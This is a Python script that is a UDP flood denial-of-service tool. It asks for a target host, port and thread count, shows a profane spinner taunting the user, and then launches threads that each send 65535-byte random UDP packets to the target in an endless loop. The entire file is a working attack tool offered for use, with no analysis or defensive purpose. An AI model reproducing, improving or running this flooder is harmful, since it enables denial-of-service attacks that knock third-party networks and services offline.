import sys
import time
import sys
import socket
import random
import os
from threading import Thread

os.system('clear')

def udp():
        tar = (url,port)
        bytes = random._urandom(65535)
        while True:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                try:
                        s.sendto(bytes,tar)
                        print("root@bossy:~# Sucess Sent Udp Attack To ---> " + str(url) + " 65535 b/s")
                except:
                        print("root@bossy:~# Network Maybe Down...Retry")
                        sys.exit()

url = str(input("[root@bossy:~# Target : "))
port = int(input("root@bossy:~# Port : "))
thr = int(input("root@bossy:~# Threads : "))

os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[\]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[|]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[/]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[\]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[|]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[/]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[\]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[|]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[/]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[\]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[|]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[/]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[\]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[|]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[/]Fuck You Damn Noob Skid")
time.sleep(0.3)
os.system('clear')
print("[-]Fuck You Damn Noob Skid")
time.sleep(1)
os.system('clear')
for i in range(thr):
        i = Thread(target=udp, name=(i))
        i.start()
